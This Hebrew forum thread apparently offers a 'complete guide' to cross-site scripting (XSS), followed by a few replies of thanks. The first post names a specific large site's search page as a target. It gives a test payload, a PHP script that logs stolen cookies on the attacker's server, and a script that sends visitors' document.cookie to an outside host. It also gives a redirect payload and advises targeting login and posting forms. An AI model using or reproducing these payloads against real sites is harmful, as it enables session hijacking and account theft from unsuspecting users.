קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. המדריך המלא לפריצת פוטושופ cs2 9
    על ידי CrAzY_BoY בפורום חתימות וסמלים
    תגובות: 15
    הודעה אחרונה: 28-05-2007, 20:19
  2. תגובות: 94
    הודעה אחרונה: 14-04-2006, 00:01
  3. המדריך המלא והמפורט למילוי ווינר
    על ידי CrAzY_BoY בפורום כדורגל
    תגובות: 3
    הודעה אחרונה: 29-12-2005, 20:40
  4. המדריך המלא להרשם ל Priston Tale Vietnam
    על ידי Alcoholic בפורום תמיכה טכנית במשחקים
    תגובות: 7
    הודעה אחרונה: 16-09-2005, 12:02
+ תגובה לנושא
מציג תוצאות 1 עד 5 מתוך 5

XSS המדריך המלא

  1. #1
    משתמש מתחיל
    תאריך הצטרפות
    06/2009
    הודעות
    193
    לייקים
    0
    נקודות
    50
    מין: זכר

    ברירת מחדל XSS המדריך המלא

    מדריך XSS מלא!
    1)הסבר מה זה XSS.
    2)שימוש XSS.
    3)סקריפטים XSS.
    אז מה זה XSS?.
    אז בעצם XSS זה פירצה מאפשרת לשתול קוד זדוני בתוך קישור תמים, או בתוך קובץ (תמונה למשל)
    שלא עובר בדיקת-תוכן.
    הקוד הזדוני יכול לבצע מספר רב של פעולות כגון גניבת ה"עוגיה" (קובץ מיוחד
    הנשתל במחשבי הגולשים ומיועד לשמירת פרטי המשתמש לצורך זיהוי אוטומטי.
    לקשר את האתר לכתובת אחרת .
    מקווה שהבנתם עם לא אל תמשיכו לקרוא לכו לגוגל ותחפשו חומר על XSS או תישאלו כאן בפורום.
    שימוש ב XSS
    למשל ניקח לדוגמא את האתר TIPO אתר גדול עם אלפי גולשים יום יום!
    נלך לחיפוש
    קוד:
     http://www.************/apps/click/TipoIndex_Search.asp
    שמה יש פריצת XSS איך בודקים?
    מריצים בחיפוש את הסריפט הבא:
    קוד:
    <script>alert("XSS");</script>
    יפה עם יש הודעה שגיאה עם המילה XSS בפנים אז יש פריצת XSS.
    אבל...דרך החיפוש רוב הסיכויים שזהל א יעבוד למה זה לא שולח פרטים למסד .. אז בעצם ההודעת שגיאה תיהיה סתם צריך לחפש מקומות יותר משמעותים כמו למשל הרשמה,התחברות,פתיחת נושא,תגובה לנושא ועוד .. תחשבו לבד.
    יפה זה בעצם הכל עם באתר יש פריצת XSS אתה יכול לגנוב עוגיה לקשר את העמוד לדף אחד לכתוב בעמוד דברים ועוד הרבה דברים ...


    סקריפטים XSS


    קוד:
    <script>alert("XSS");</script> בדיקת XSS



    גניבת עוגיות


    אתם צריכים שרת שלשם ישלחו העוגיות..
    עכשיו פתחו בשרת שלכם קובץ בשם logfile.txt


    וקובץ בשם : XSS.PHP
    קוד:
    <?php
    $filename = "logfile.txt";
    if (isset($_GET["cookie"]))
    {
    if (!$handle = fopen($filename, 'a'))
    {
    exit;
    }
    else
    {
    if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
    {
    exit;
    }
    }
    fclose($handle);
    exit;
    }
    exit;
    ?>
    יפה עכשיו פשוט הסקריפט
    קוד:
    <script>location.href=("http://www.exxxx.co.il/xss.php?cookie="+document.cookie)</Script>
    קישור לדף אחר שמים בדף איפה שהחור XSS שלכם

    קוד:
    <script>location.href("walla.co.il");</script>

    זהו הסוף..
    קרדיט לאתר אחר

  2. קישורים ממומנים

  3. #2
    מורחקים
    תאריך הצטרפות
    07/2010
    גיל
    30
    הודעות
    189
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    תודה רבה אחי קל ומובן !

  4. #3
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    מדריך מוכר כל הכבוד P:

  5. #4
    משתמש מתחיל
    תאריך הצטרפות
    06/2009
    הודעות
    193
    לייקים
    0
    נקודות
    50
    מין: זכר

    ברירת מחדל

    עוד תגובות..

  6. #5
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    אהבתי???? חח

+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 18:17.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,499,442 | הודעות: 8,200,035 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect